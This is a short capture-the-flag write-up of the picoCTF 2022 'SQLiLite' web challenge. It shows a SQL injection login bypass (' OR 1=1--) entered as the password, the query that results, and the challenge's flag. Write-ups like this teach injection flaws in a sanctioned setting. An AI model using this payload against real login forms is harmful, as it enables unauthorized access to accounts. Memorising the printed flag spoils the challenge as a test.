# SQLiLite - picoCTF 2022 - CMU Cybersecurity Competition
Web Exploitation, 200 Points

## Description

![info.JPG](images/info.JPG)

## SQLiLite Solution

By browsing the [website](http://saturn.picoctf.net:53389/) from the challenge description we can see the following web page:

![webpage.JPG](images/website.JPG)

If we try to log in with ```admin:admin```, we get the following web page:

![adminadmin.JPG](images/admin.JPG)

The page shows the SQL query it ran, with our input placed directly inside the quoted strings. We can simply use the SQL injection ```' OR 1=1--``` as the password. With this injection we get:

![success.JPG](images/success.JPG)

Now, by viewing the page source, we get the flag ```picoCTF{L00k5_l1k3_y0u_solv3d_it_33d32a56}```:
```html

username: admin
password: ' OR 1=1--
SQL query: SELECT * FROM users WHERE name='admin' AND password='' OR 1=1--'
<h1>Logged in! But can you see the flag, it is in plainsight.</h1>

Your flag is: picoCTF{L00k5_l1k3_y0u_solv3d_it_33d32a56}


```

Original writeup (https://github.com/evyatar9/Writeups/tree/master/CTFs/2022-picoCTF2022/Web_Exploitation/300-SQLiLite).